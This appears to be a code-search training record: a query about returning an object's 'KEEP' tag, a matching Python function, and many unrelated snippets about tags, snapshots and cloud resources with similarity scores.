distribution[\"product\"],\n\t\t\t\t\"distribution\": distribution[\"version\"],\n\t\t\t\t\"build\": {\n\t\t\t\t\t\"name\": package[\"build\"],\n\t\t\t\t\t\"rpms\": map(lambda l: {\"name\": l}, rpms)\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tprint \"%sScanning %s ... 
[%s/%s]%s\" % (WHITE, package[\"build\"], index, total, ENDC)\n\t\t\tindex = index + 1\n\t\t\ttry:\n\t\t\t\tself.scanbuildact.call(data)\n\t\t\texcept ActFailedError as e:\n\t\t\t\tlogging.error(e)\n\t\t\t\tself._failed[key].append(package)\n\t\t\t\tcontinue\n\t\t\texcept FunctionFailedError as e:\n\t\t\t\tlogging.error(e)\n\t\t\t\tself._failed[key].append(package)\n\t\t\t\tcontinue\n\n\t\t\tself._scanned[key] = self._scanned[key] + 1\n\n\t\tprint \"%sscanned %s, failed %s%s\" % (YELLOW, self._scanned[key], len(self._failed[key]), ENDC)\n\t\tprint \"\"", "async def test_get_attached_instruments(subject: Controller):\n instruments = await subject.get_attached_instruments({})\n assert instruments[Mount.RIGHT][\"id\"] == \"P20SV202020070101\"\n assert instruments[Mount.RIGHT][\"config\"].display_name == \"P20 Single-Channel GEN2\"\n assert instruments[Mount.LEFT][\"id\"] == \"P3HMV202020041605\"\n assert instruments[Mount.LEFT][\"config\"].display_name == \"P20 8-Channel GEN2\"", "def get_exploration_snapshots_metadata(exploration_id, limit):\n exploration = get_exploration_by_id(exploration_id)\n oldest_version = max(exploration.version - limit, 0) + 1\n current_version = exploration.version\n version_nums = range(current_version, oldest_version - 1, -1)\n\n return [exp_models.ExplorationSnapshotModel.get_metadata(\n exploration_id, version_num\n ) for version_num in version_nums]", "def get_many_descriptors(self, uuids):", "def get_mapping_actions(image=None, imageId=None, in_digests=[], bundle={}):\n\n if not image or not bundle:\n raise Exception(\"input error\")\n\n if not verify_policy_bundle(bundle=bundle):\n raise Exception(\"input bundle does not conform to bundle schema\")\n\n ret = []\n \n image_infos = []\n\n image_info = anchore_utils.get_all_image_info(image)\n if image_info and image_info not in image_infos:\n image_infos.append(image_info)\n\n for m in bundle['mappings']:\n polname = m['policy_id']\n wlnames = m['whitelist_ids']\n\n for image_info in image_infos:\n #_logger.info(\"IMAGE INFO: \" + str(image_info))\n ii = {}\n ii.update(image_info)\n registry = ii.pop('registry', \"N/A\")\n repo = ii.pop('repo', \"N/A\")\n\n tags = []\n fulltag = ii.pop('fulltag', \"N/A\")\n if fulltag != 'N/A':\n tinfo = anchore_utils.parse_dockerimage_string(fulltag)\n if 'tag' in tinfo and tinfo['tag']:\n tag = tinfo['tag']\n\n for t in [image, fulltag]:\n tinfo = anchore_utils.parse_dockerimage_string(t)\n if 'tag' in tinfo and tinfo['tag'] and tinfo['tag'] not in tags:\n tags.append(tinfo['tag'])\n\n digest = ii.pop('digest', \"N/A\")\n digests = [digest]\n for d in image_info['digests']:\n dinfo = anchore_utils.parse_dockerimage_string(d)\n if 'digest' in dinfo and dinfo['digest']:\n digests.append(dinfo['digest'])\n \n p_ids = []\n p_names = []\n for p in bundle['policies']:\n p_ids.append(p['id'])\n p_names.append(p['name'])\n\n wl_ids = []\n wl_names = []\n for wl in bundle['whitelists']:\n wl_ids.append(wl['id'])\n wl_names.append(wl['name'])\n \n if polname not in p_ids:\n _logger.info(\"policy not in bundle: \" + str(polname))\n continue\n\n skip=False\n for wlname in wlnames:\n if wlname not in wl_ids:\n _logger.info(\"whitelist not in bundle\" + str(wlname))\n skip=True\n if skip:\n continue\n\n mname = m['name']\n mregistry = m['registry']\n mrepo = m['repository']\n if m['image']['type'] == 'tag':\n mtag = m['image']['value']\n mdigest = None\n mimageId = None\n elif m['image']['type'] == 'digest':\n mdigest = m['image']['value']\n mtag = None\n mimageId = None\n elif 
m['image']['type'] == 'id':\n mimageId = m['image']['value']\n mtag = None\n mdigest = None\n else:\n mtag = mdigest = mimageId = None\n\n if registry == mregistry or mregistry == '*':\n _logger.debug(\"checking mapping for image (\"+str(image_info)+\") match.\")\n\n if repo == mrepo or mrepo == '*':\n doit = False\n matchstring = mname + \": N/A\"\n if tag and (mtag == '*' or mtag == tag or mtag in tags):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mtag])\n doit = True\n elif digest and (mdigest == digest or mdigest in in_digests or mdigest in digests):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mdigest])\n doit = True\n elif imageId and (mimageId == imageId):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mimageId])\n doit = True\n\n matchstring = matchstring.encode('utf8')\n if doit:\n _logger.debug(\"match found for image (\"+str(matchstring)+\")\")\n\n wldata = []\n wldataset = set()\n for wlname in wlnames:\n wldataset = set(list(wldataset) + extract_whitelist_data(bundle, wlname))\n wldata = list(wldataset)\n\n poldata = extract_policy_data(bundle, polname)\n \n wlnames.sort()\n evalstr = ','.join([polname] + wlnames)\n evalhash = hashlib.md5(evalstr).hexdigest()\n ret.append( ( poldata, wldata, polname,wlnames, matchstring, m, evalhash) )\n return(ret)\n else:\n _logger.debug(\"no match found for image (\"+str(image_info)+\") match.\")\n else:\n _logger.debug(\"no match found for image (\"+str(image_info)+\") match.\")\n\n return(ret)", "def get_snapshots(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_snapshots = conn.get_all_snapshots(owner='self')\n except boto.exception.EC2ResponseError:\n return []\n return region_snapshots", "def link_snapshot(argstr):\n pass", "def test_aws_service_api_snapshots_get(self):\n pass", "def show(self):\n self.parser.add_argument('assembly_uuid',\n help=\"Assembly uuid or name\")\n args = self.parser.parse_args()\n response = self.client.assemblies.find(name_or_id=args.assembly_uuid)\n fields = ['uuid', 'name', 'description', 'status', 'application_uri',\n 'trigger_uri']\n data = dict([(f, getattr(response, f, ''))\n for f in fields])\n cliutils.print_dict(data, wrap=72)", "def show_snapshot(self, snapshot_id):\n url = \"snapshots/%s\" % snapshot_id\n resp, body = self.get(url)\n body = json.loads(body)\n self.validate_response(schema.show_snapshot, resp, body)\n return rest_client.ResponseBody(resp, body)", "async def list(app: AppIdentity, repo: str, ref: str):\n repo = RepoName.parse(repo)\n\n async with aiohttp.ClientSession(\n headers=await app.installation_headers(repo.owner)) as sesh:\n fetch = checks.GetRuns(owner=repo.owner, repo=repo.repo, ref=ref)\n print(await fetch.execute(sesh))", "def select_mips_from_reference_seq(reference_name):\n\n for mip in Mip.objects.filter(reference_id=reference_name):\n print mip", "def get_snapshot_output(project: Optional[pulumi.Input[Optional[str]]] = None,\n snapshot: Optional[pulumi.Input[str]] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetSnapshotResult]:\n ...", "def get_snapshot_ids_output(filters: Optional[pulumi.Input[Optional[Sequence[pulumi.InputType['GetSnapshotIdsFilterArgs']]]]] = None,\n owners: Optional[pulumi.Input[Optional[Sequence[str]]]] = None,\n restorable_by_user_ids: Optional[pulumi.Input[Optional[Sequence[str]]]] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetSnapshotIdsResult]:\n ...", "def list_snapshots(self, account_id=None, 
max_items=100):\n if not account_id:\n account_id = get_instance_identity_document()['accountId']\n paginator = self.__client.get_paginator('describe_snapshots')\n response = paginator.paginate(OwnerIds=[account_id], PaginationConfig={'MaxItems': max_items}) \\\n .build_full_result()\n\n return EBSSnapshotsList(response)", "def get_snap_info_by_volname(mnode, volname):\n\n cmd = \"gluster snapshot info volume %s --xml\" % volname\n ret, out, _ = g.run(mnode, cmd)\n if ret != 0:\n g.log.error(\"Failed to execute 'snapshot info' on node %s. \"\n \"Hence failed to get the snapshot info.\", mnode)\n return None\n\n try:\n root = etree.XML(out)\n except etree.ParseError:\n g.log.error(\"Failed to parse the gluster snapshot \"\n \"info xml output.\")\n return None\n\n snap_vol_info = {}\n\n for snap in root.findall(\"snapInfo\"):\n for element in snap.getchildren():\n if element.tag == \"originVolume\":\n info = {}\n for elmt in element.getchildren():\n info[elmt.tag] = elmt.text\n snap_vol_info[element.tag] = info\n else:\n snap_vol_info[element.tag] = element.text\n\n snap_info_list = []\n for snap in root.findall(\"snapInfo/snapshots/snapshot\"):\n snap_info = {}\n for element in snap.getchildren():\n if element.tag == \"snapVolume\":\n info = {}\n for elmt in element.getchildren():\n if elmt.tag == \"originVolume\":\n info[\"originVolume\"] = {}\n for el in elmt.getchildren():\n info[elmt.tag][el.tag] = el.text\n else:\n info[elmt.tag] = elmt.text\n snap_info[element.tag] = info\n else:\n snap_info[element.tag] = element.text\n snap_info_list.append(snap_info)\n snap_vol_info[\"snapshots\"] = snap_info_list\n return snap_vol_info", "def list_images():\n return json_response(list_manifests())", "def test_link_snapshot_by_snap_id(self):\n snapshot_info, sg_name = self.create_sg_snapshot()\n target_sg = \"{sg}_lnk\".format(sg=sg_name)\n snap_name = snapshot_info.get('name')\n snap_id = snapshot_info.get('snapid')\n self.assertIsNotNone(snap_id)\n self.replication.link_snapshot_by_snap_id(\n sg_name, target_sg, snap_name, snap_id)\n snap_details = self._test_get_ss_snapid_detail(\n sg_name, snap_name, snap_id, check_linked=True)\n self.assertTrue(snap_details.get('linked'))\n self.replication.modify_storage_group_snapshot_by_snap_id(\n sg_name, target_sg, snap_name, snap_id, unlink=True)\n snap_details = self._test_get_ss_snapid_detail(\n sg_name, snap_name, snap_id, check_unlinked=True)\n self.assertFalse(snap_details.get('linked'))\n self.provisioning.delete_storage_group(target_sg)", "def get_searched_snaps(search_results):\n return (\n search_results['_embedded']['clickindex:package']\n if '_embedded' in search_results\n else []\n )", "def show_snapshot_metadata(self, snapshot_id):\n url = \"snapshots/%s/metadata\" % snapshot_id\n resp, body = self.get(url)\n body = json.loads(body)\n self.validate_response(schema.show_snapshot_metadata, resp, body)\n return rest_client.ResponseBody(resp, body)", "def ami_by_location(self, location):\n if self.region == 'pytest' or not self.region or not location:\n # Short-circuit if we're running a test or do not have data\n return 'ami-notfound'\n client = boto3.client('ec2', region_name=self.region)\n response = client.describe_images(Filters=[\n {'Name': 'manifest-location', 'Values': [location]},\n ])\n if len(response['Images']) == 0:\n raise RuntimeError('No AMIs found with location: %s' % location)\n if len(response['Images']) > 1:\n raise RuntimeError('Multiple AMIs found: %s' % response['Images'])\n return response['Images'][0]['ImageId']", "def 
snapshot_by_id(self, snapshot_id: int) -> Optional[Snapshot]:\n try:\n return next(snapshot for snapshot in self.metadata.snapshots if snapshot.snapshot_id == snapshot_id)\n except StopIteration:\n return None", "def archive_list(self) -> List[str]:\n bucket = self.client()\n results = []\n for item in bucket.objects.all():\n if (\n item.key.endswith(\".arcd\") or item.key.endswith(\".arcd.gpg\")\n ) and \"meta\" not in item.key:\n results.append(item.key.split(\".\", 1)[0])\n return results", "def get_assemblies_link_from_accession_number(term):\n ###########print('+++++++',term)\n # provide your own mail here # I wrote the email at the begining of the codes\n handle = Entrez.esearch(db=\"assembly\", term=term, retmax=\"200\")\n record = Entrez.read(handle)\n ids = record[\"IdList\"]\n links = []\n for aid in ids:\n summary = get_id_give_assembly_summary(aid) # get summary\n url = summary[\"DocumentSummarySet\"][\"DocumentSummary\"][0][\"FtpPath_RefSeq\"]\n if url == \"\":\n continue\n label = os.path.basename(url)\n # get the fasta link - change this to get other formats\n link = url + \"/\" + label + \"_genomic.fna.gz\"\n link = link.replace(\"ftp://\", \"https://\")\n links.append(link)\n \n #############print('=======', links)\n return links", "def get_assemblies(term, download=True, path='assemblies'):\n\n from Bio import Entrez\n #provide your own mail here\n Entrez.email = \"A.N.Other@example.com\"\n handle = Entrez.esearch(db=\"assembly\", term=term, retmax='200')\n record = Entrez.read(handle)\n ids = record['IdList']\n print (f'found {len(ids)} ids')\n links = []\n for id in ids:\n #get summary\n summary = get_assembly_summary(id)\n #get ftp link\n url = summary['DocumentSummarySet']['DocumentSummary'][0]['FtpPath_RefSeq']\n if url == '':\n continue\n label = os.path.basename(url)\n #get the fasta link - change this to get other formats\n link = os.path.join(url,label+'_genomic.fna.gz')\n print (link)\n links.append(link)\n if download == True:\n #download link\n urllib.request.urlretrieve(link, f'{label}.fna.gz')\n return links", "def get_scnlist_all(self):\n logger.debug(\"Creating Database Engine and Session.\")\n db_engine = sqlalchemy.create_engine(self.db_info_obj.dbConn)\n session_sqlalc = sqlalchemy.orm.sessionmaker(bind=db_engine)\n ses = session_sqlalc()\n logger.debug(\"Perform query to find scenes which need downloading.\")\n query_result = ses.query(EDDSentinel1ASF).order_by(EDDSentinel1ASF.Acquisition_Date.asc()).all()\n scns = list()\n if query_result is not None:\n for record in query_result:\n scns.append(record.PID)\n ses.close()\n logger.debug(\"Closed the database session.\")\n return scns", "def _instancelist(self):\n\n rv = []\n self.iname = {}\n for resv in self.conn.get_all_reservations():\n for inst in resv.instances:\n if inst.state != 'terminated':\n name = inst.tags.get('Name',None)\n rv.append([inst.id,inst.state])\n if name is not None:\n rv.append([name,inst.state])\n else:\n rv.append([inst.id+'-needsName',inst.state])\n self.iname[name] = inst.id\n self.iname[inst.id] = inst.id\n return rv", "def test_ami_exists(self) -> None:\n owner = self.sts.get_caller_identity().get('Account')\n amis = self.ec2_client.describe_images(\n Owners=[owner],\n Filters=[{\n 'Name': 'name',\n 'Values': ['saints-xctf-web-server*']\n }]\n )\n self.assertTrue(len(amis.get('Images')) > 0)", "def get_snapshot(project, zone, instance):\n snapshot_disks(project, zone, *get_disks(instance))", "def test_volume_snapshot_create_get_list_delete(self):\n volume = 
self.create_volume()\n self.addCleanup(self.delete_volume, volume['id'])\n\n s_name = data_utils.rand_name(self.__class__.__name__ + '-Snapshot')\n # Create snapshot\n snapshot = self.snapshots_client.create_snapshot(\n volume_id=volume['id'],\n display_name=s_name)['snapshot']\n\n def delete_snapshot(snapshot_id):\n waiters.wait_for_volume_resource_status(self.snapshots_client,\n snapshot_id,\n 'available')\n # Delete snapshot\n self.snapshots_client.delete_snapshot(snapshot_id)\n self.snapshots_client.wait_for_resource_deletion(snapshot_id)\n\n self.addCleanup(delete_snapshot, snapshot['id'])\n self.assertEqual(volume['id'], snapshot['volumeId'])\n # Get snapshot\n fetched_snapshot = self.snapshots_client.show_snapshot(\n snapshot['id'])['snapshot']\n self.assertEqual(s_name, fetched_snapshot['displayName'])\n self.assertEqual(volume['id'], fetched_snapshot['volumeId'])\n # Fetch all snapshots\n snapshots = self.snapshots_client.list_snapshots()['snapshots']\n self.assertIn(snapshot['id'], map(lambda x: x['id'], snapshots))", "def find_amr(self):\n import csv\n amr_data = csv.DictReader(open(self.nasmnt + \"WGSspades/reports/resfinder.csv\"))\n for row in amr_data:\n name = row[\"Contig\"].split(\"_\")[0]\n if name in self.names:\n if float(row[\"PercentIdentity\"]) > 98.0:\n amr = list()\n amr.append(row[\"Gene\"])\n amr.append(row[\"Resistance\"])\n amr.append(row[\"PercentIdentity\"])\n if \"AMR\" in self.metadata[name]:\n self.metadata[name][\"AMR\"].append(amr)\n else:\n self.metadata[name][\"AMR\"] = list()\n self.metadata[name][\"AMR\"].append(amr)\n\n # print(self.metadata)" ]
[ "0.72130966", "0.6595902", "0.6541823", "0.6166669", "0.61240566", "0.60049653", "0.59619623", "0.5923196", "0.5922994", "0.5888076", "0.5858373", "0.5827235", "0.58137566", "0.580514", "0.57657516", "0.57389045", "0.5632397", "0.56060064", "0.5601814", "0.56017476", "0.5551599", "0.5520943", "0.55089486", "0.54938936", "0.5476389", "0.54459274", "0.54459274", "0.541808", "0.54120713", "0.54077", "0.5407466", "0.54010427", "0.5364513", "0.53357106", "0.5323034", "0.5304825", "0.52497435", "0.52294546", "0.5206177", "0.5175656", "0.5159866", "0.51379645", "0.5131944", "0.5126953", "0.5102134", "0.5081561", "0.5081322", "0.50618327", "0.505268", "0.5050425", "0.5040057", "0.50397044", "0.5034769", "0.50284886", "0.5015735", "0.50115025", "0.5011213", "0.49611318", "0.49569505", "0.49569505", "0.4938782", "0.49229375", "0.4900251", "0.48707324", "0.48455545", "0.48451984", "0.4839872", "0.4839526", "0.48364162", "0.48322642", "0.4819993", "0.4817902", "0.47946495", "0.4788866", "0.47887415", "0.47846192", "0.4779534", "0.47733963", "0.4771701", "0.47427654", "0.47381124", "0.4722611", "0.47205424", "0.47198424", "0.47190905", "0.47079012", "0.4695236", "0.4691493", "0.46904847", "0.4683625", "0.46803856", "0.46786305", "0.46739957", "0.4673754", "0.46680027", "0.46675068", "0.46629855", "0.46514148", "0.46486932", "0.46482283" ]
0.77030766
0
If tag with key='KEEP' exists, return its value (can be an empty string), else it's 'notag'
def getKeepTag(obj):
    if 'KEEP' in obj.tags:
        return obj.tags['KEEP']
    else:
        return "-------no-tag"
    # try:
    #     tag = obj.tags['KEEP']
    # except:
    #     # Note: some with empty KEEP-tags, through web console they look the same as those untagged
    #     return "-----"
    # return tag
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_keep_tag(obj):\n if 'KEEP' in obj.tags and len(obj.tags['KEEP'].strip()) != 0:\n return obj.tags['KEEP']\n else:\n return \"-------no-tag\"", "def tag_word(self, w): \n if self.unknown(w):\n return self.default_tag\n else:\n return max(self.word_tags[w], key=self.word_tags[w].get)", "def gettag(query, lemmatag=False):\n if lemmatag:\n return lemmatag\n\n tagdict = {'N': 'n',\n 'J': 'a',\n 'V': 'v',\n 'A': 'r',\n 'None': False,\n '': False,\n 'Off': False}\n\n # in case someone compiles the tregex query\n try:\n query = query.pattern\n except AttributeError:\n query = query\n \n\n qr = query.replace(r'\\w', '').replace(r'\\s', '').replace(r'\\b', '')\n firstletter = next((c for c in qr if c.isalpha()), 'n')\n return tagdict.get(firstletter.upper(), 'n')", "def getStrNo(self, key):\n value = self.getConf(key);\n if value == \"no\":\n return None\n else:\n return value", "def check_tag(obj, tag_name):\n rfctag = None\n if obj.get('Tags'):\n for tag in obj.get('Tags'):\n if tag.get('Key') == tag_name:\n tag_value = tag.get('Value')\n tag_value = re.sub('[,]', '/', tag_value)\n return tag_value\n continue\n if not rfctag:\n return str(\"no-record\")", "def salvage_tag_data(tag_text):\n data = process_start_tag(tag_text)\n tag = data[0]\n attributes = data[1]\n # Jloggraph applet data\n if tag == \"param\" and \"name\" in attributes:\n if attributes[\"name\"] == \"table\" and \"value\" in attributes:\n return attributes[\"value\"]\n # Spacegroup\n if tag_is_spacegroup(tag_text):\n return tag_text\n\n # Return an empty string by default\n return \"\"", "def _issingleton(self, tagname):\n return self.shortempty", "def tp_key_value(str_tag):\n rgx_split = re.compile(r'[\\@\\(\\)\\{\\}]')\n str_key, str_value = '', ''\n\n # count the pieces\n lst_parts = rgx_split.split(str_tag)\n lng_parts = len(lst_parts)\n\n # and winnow the noise\n if lng_parts > 1:\n str_key = lst_parts[1]\n if lng_parts > 2:\n for str_value in lst_parts[2:]:\n if str_value != '':\n break\n\n return (str_key, str_value)", "def get_config_value(keyword):\n if g_configs and keyword in g_configs:\n return g_configs[keyword]\n return \"\"", "def tag_to_wordnet(tag):\n if (tag == 'ADJ'): return('a')\n elif (tag == 'ADV'): return('r')\n elif (tag == 'NOUN'): return('n')\n elif (tag == 'VERB'): return('v')\n else: return None", "def cypher_unknownTag_keyword(self, variable_tagUnknown=\"tag_unknown\"):\n\n if not self.keyword:\n return \"\"\n return f'({variable_tagUnknown}{self.label}'+ \\\n \"{\" + f'{self.databaseInfoTag[\"properties\"][\"keyword\"]}:\\'{self.keyword}\\'' + \"})\"", "def filter_tag(tags=None):\n tagdict = defaultdict(list)\n Besarkecil = lambda f: ' '.join(re.findall('[A-Z][^A-Z]*', f))\n for obj in list(tags):\n if len(obj.split(':')) == 2:\n k, v = obj.split(':')\n # filtering key Besarkecil, lowercase\n k = str(Besarkecil(k)).lower()\n # print(k)\n if k in ['cari', 'jadwal', 'keberangkatan', 'maskapai', 'type', 'ibadah', 'jumlah hari', 'rute', 'tour']:\n res = re.findall(r\"(^[A-Z][^A-Z]+)|([^\\W\\d_]+|[\\d+]+)\", v)\n arres = []\n for resple in res:\n arres.append(filter(None, resple)[0])\n # print([e for e in resple])\n # print(' '.join(arres))\n tagdict[k].append(' '.join(arres))\n return tagdict", "def get_tag_value_or_none(node, element_name):\n tag_value = node.tags.get(element_name, 'n/a')\n\n if 'n/a' == tag_value:\n return None\n\n return tag_value", "def filter_tag(tags=None):\n tagdict = defaultdict(list)\n Besarkecil = lambda f: ' '.join(re.findall('[A-Z][^A-Z]*', f))\n for obj in 
list(tags):\n if len(obj.split(':')) == 2:\n k, v = obj.split(':')\n # filtering key Besarkecil, lowercase\n k = str(Besarkecil(k)).lower()\n # print(k)\n if k in ['cari', 'jadwal', 'keberangkatan', 'maskapai', 'type', 'ibadah', 'jumlah hari', 'rute',\n 'tour']:\n res = re.findall(r\"(^[A-Z][^A-Z]+)|([^\\W\\d_]+|[\\d+]+)\", v)\n arres = []\n for resple in res:\n arres.append(filter(None, resple)[0])\n # print([e for e in resple])\n # print(' '.join(arres))\n tagdict[k].append(' '.join(arres))\n return tagdict", "def getOptionalTag(node, tag, option=\"\"):\n try:\n return getTag(node, tag)\n except TagError:\n return option", "def tag_word(self, w):\n return self._default_tag", "def tag_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"tag_value\")", "def kwextract(s):\n try:\n return strip(s, \"$\").strip().split(\": \")[1]\n except IndexError:\n return \"<unknown>\"", "def cypher_naTag_keyword(self, variable_tagNA=\"na_tag\"):\n\n if not self.keyword:\n return \"\"\n return f'({variable_tagNA}{self.label}' + \\\n \"{\" + f'{self.databaseInfoTag[\"properties\"][\"keyword\"]}:\"{self.keyword}\"' + \"})\"", "def gettag(query, lemmatag = False):\n import re\n if lemmatag is False:\n tag = 'n' # same default as wordnet\n # attempt to find tag from tregex query\n tagfinder = re.compile(r'^[^A-Za-z]*([A-Za-z]*)')\n tagchecker = re.compile(r'^[A-Z]{1,4}$')\n treebank_tag = re.findall(tagfinder, query.replace(r'\\w', '').replace(r'\\s', '').replace(r'\\b', ''))\n if re.match(tagchecker, treebank_tag[0]):\n if treebank_tag[0].startswith('J'):\n tag = 'a'\n elif treebank_tag[0].startswith('V') or treebank_tag[0].startswith('M'):\n tag = 'v'\n elif treebank_tag[0].startswith('N'):\n tag = 'n'\n elif treebank_tag[0].startswith('R'):\n tag = 'r'\n elif lemmatag:\n tag = lemmatag\n tagchecker = re.compile(r'^[avrn]$')\n while not re.match(tagchecker, lemmatag):\n time = strftime(\"%H:%M:%S\", localtime())\n selection = raw_input('\\n%s: WordNet POS tag \"%s\" not recognised.\\n It must be:\\n\\n ' \\\n ' a: (adjective)' \\\n ' n: (noun)' \\\n ' r: (adverb)' \\\n ' v: (verb)\\n\\nYour selection: ' % (time, lemmatag))\n lemmatag = selection\n return tag", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"stitch\":\n return \"NewStitch\"\n return key", "def keep(tag):\n if tag.name != 'span':\n return\n if tag.parent.has_attr('class'):\n for c in tag.parent['class']:\n if 'example' in c:\n return\n\n if tag.has_attr('class'):\n if 'types' in tag['class']:\n if 'customTracks' not in tag['class']:\n return True", "def _tag_of(entry: _LexiconEntry) -> str:\n return entry[\"tag\"].upper()", "def get_value(soup, tag, cond, default=None):\r\n ele = soup.find(tag, cond)\r\n if ele:\r\n return ele.text.strip()\r\n return default", "def __getitem__(self, tag):\n return self.__tags.get(tag.lower(), 0)", "def word_tag(self, word):\n if word[1] in (\"NN\", \"NNS\", \"NNP\", \"NNPS\"):\n return _wordnet.NOUN\n if word[1] in (\"JJ\", \"JJR\", \"JJS\"):\n return _wordnet.ADJ\n if word[1] in (\"VB\", \"VBD\", \"VBG\", \"VBN\", \"VBP\", \"VBZ\"):\n return _wordnet.VERB\n if word[1] in (\"RB\", \"RBR\", \"RBS\"):\n return _wordnet.ADV\n\n return None", "def mapping(tag):\n\n return gvars.METAINFO['tag_map'][tag.replace('1', '')]", "def _get_xml_tag(doc):\n tag = type(doc).type_key.split('.')[3]\n tag = convert.str_to_camel_case(tag)\n\n return tag", "def get_tag_value(\n service: str,\n tags: List[Any],\n tag_key: str,\n) -> str:\n capitalize = 
capitalize_tag_kv(service)\n matches = [\n t[f\"{'V' if capitalize else 'v'}alue\"]\n for t in tags\n if t[f\"{'K' if capitalize else 'k'}ey\"] == tag_key\n ]\n if len(matches) != 1:\n log_error(\n f\"Oops it looks like we're unable to find a match for tag {tag_key}.\"\n \"Please open an issue to help us get this fixed!\",\n )\n raise Abort()\n\n return matches[0]", "def tag(self,name):\n return self._tags.get(name,None)", "def get_keyword(package):\n\ttry:\n\t\tsubstr = re.search(r'(\\S+)_(\\S+)', package)\n\t\tif substr:\n\t\t\treturn substr.groups()\n\texcept Exception,e:\n\t\tlog.error(str(e))\n\t\treturn None", "def get_suggested(schema, key):\n for k in schema.keys():\n if k == key:\n if k.description is None or \"suggested_value\" not in k.description:\n return None\n return k.description[\"suggested_value\"]", "def get_asg_tag(tags, tag_name):\n result = {}\n for tag in tags:\n for key, val in tag.items():\n if val == tag_name:\n result = tag\n return result", "def unknown_starttag(self, tag, attrs):\n if tag in self.valid_tags:\n self.result.append('<' + tag)\n for k, v in attrs:\n if string.lower(k[0:2]) != 'on' and", "def getDbStrNo(self, db, key):\n value = self.getDbStr(db, key)\n if value == \"no\":\n return None\n else:\n return value", "def tag(self,name):\n try:\n return self.doc.getElementsByTagName(name)[0].firstChild.wholeText\n except IndexError:\n # Check for a hash tag with legacy API\n if name in ['md5','sha1','sha256']:\n for e in self.doc.getElementsByTagName('hashdigest'):\n if e.getAttribute('type').lower()==name:\n return e.firstChild.wholeText\n raise KeyError,name+\" not in XML\"", "def get_tag(self, tag_type: str) -> str:\n if tag_type in self.tags:\n return self.tags[tag_type]\n return None", "def retagger(tags):\n if tags == 'Positive':\n return 'pos'\n else:\n return 'neg'", "def isImportantToken(self, token, ignoreSemanticTagList=[]):\n if len(ignoreSemanticTagList) > 0: \n tags = token.getSemanticTagMatches(ignoreSemanticTagList)\n else:\n tags = []\n return token.isSymbol() == False \\\n and token.text not in self.ignoreWords and len(tags) == 0", "def intf_TAGNOTQUERY(E):\n if not inc.TXT_or_LST_of_TXTs(E.The,1):\n print(\"Input Error: nottag?\")\n print(intf_TAGNOTQUERY.__doc__)\n return # Without doing much of anything.\n mytags= E.The.StackPop().val\n if type(mytags)==type(list()):\n #mytags= map(lambda x:x.val, mytags) # Should now be a list of TXTs.\n mytags= [x.val for x in mytags] # Should now be a list of TXTs.\n else:\n mytags= [ mytags ] # Also a (1 item) list of ints.\n disqualifying_ents= list()\n for myeid in MMEL.El.keys():\n atagishere= False # Assume they're here until one is not found.\n for mytag in mytags:\n #print(\"Searching entity #%d for tag ''%s''\" % (myeid,mytag))\n if MMEL.El[myeid].has_tag(mytag):\n atagishere= True\n break\n if atagishere:\n disqualifying_ents.append( myeid )\n qualifying_ents= list() # For inverting.\n for myeid in MMEL.El.keys(): # Go through all ents again.\n if myeid not in disqualifying_ents: # Add ones not found before.\n qualifying_ents.append(myeid)\n # Objectify remaining.\n qualifying_ents= [objectifier.StackOB_VAL(m) for m in qualifying_ents] \n E.The.StackPush( objectifier.StackOB_LST(qualifying_ents) )", "def get_tag(self, xaf, name, not_found_value=None,\n counter_str_value='latest', force_step_name=None,\n force_plugin_name=None):\n tag_name = self.__get_tag_name(name, counter_str_value,\n force_step_name, force_plugin_name)\n return xaf.tags.get(tag_name, not_found_value)", "def 
get_tag(self, scope, key):\r\n print 'GETTING', scope, key, self._tags\r\n return self._tags[scope].get(key)", "def _get_tagged_value(self, key):\n return self._tagged_values_dict[key]", "def get_suggested(schema, key):\n for k in schema:\n if k == key:\n if k.description is None or \"suggested_value\" not in k.description:\n return None\n return k.description[\"suggested_value\"]\n # Wanted key absent from schema\n raise Exception", "def _extract_latest_from_search_triple(\n triple: Tuple[str, str, str]\n) -> Optional[str]:\n description, installed, latest = triple\n if re_test(r'\\s*ballet \\(.+\\)\\s*-\\s*\\w*', description):\n if 'INSTALLED' in installed and 'LATEST' in latest:\n return re_find(r'\\s*LATEST:\\s*(.+)', latest)\n return None", "def _find(self, keyword):\n for tag in self.meta.findall(CN('meta:keyword')):\n if keyword == tag.text:\n return tag\n return None", "def map_postags(treebank_tag):\n\n if treebank_tag.startswith('J'):\n return \"a\"\n elif treebank_tag.startswith('V'):\n return \"v\"\n elif treebank_tag.startswith('N'):\n return \"n\"\n elif treebank_tag.startswith('R'):\n return \"r\"\n else:\n return 'n'", "def safe_extract(extracted_tag, replacement_value = None):\n try:\n value = extracted_tag.text\n except:\n value = replacement_value\n\n return value", "def getKeyword(self, key):\n try:\n return self.raw[0].header[key]\n except:\n return self.raw[0].header['HIERARCH ESO '+key]", "def _text_or_none(root, tag):\n elem = root.find(tag)\n return None if elem is None else elem.text", "def should_tag_enis(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"should_tag_enis\")", "def get_tag(tag):\r\n from tagging.models import Tag\r\n if isinstance(tag, Tag):\r\n return tag\r\n\r\n try:\r\n if isinstance(tag, types.StringTypes):\r\n return Tag.objects.get(name=tag)\r\n elif isinstance(tag, (types.IntType, types.LongType)):\r\n return Tag.objects.get(id=tag)\r\n except Tag.DoesNotExist:\r\n pass\r\n\r\n return None", "def POStag(self, word):\n \t\tif word in (\"'\",\",\",\".\",':',';','.'):\n \t\t\ttag = 'PUNCT'\n \t\telif word == '-':\n \t\t\ttag = 'DASH'\n \t\telse:\n \t\t\ttag = 'NOTAG'\n \t\treturn tag", "def tagged(self):\n v = self[3]\n return (v >> 5 & 0b1) != 0", "def _get_tag(self):\n return self.__tag", "def extract(data, key):\n for d in data:\n if d.startswith(key):\n return d.replace(key+':','').strip() #remove the parser tag then remove the spaces", "def get_did_you_know():\r\n\tdid_you_know = 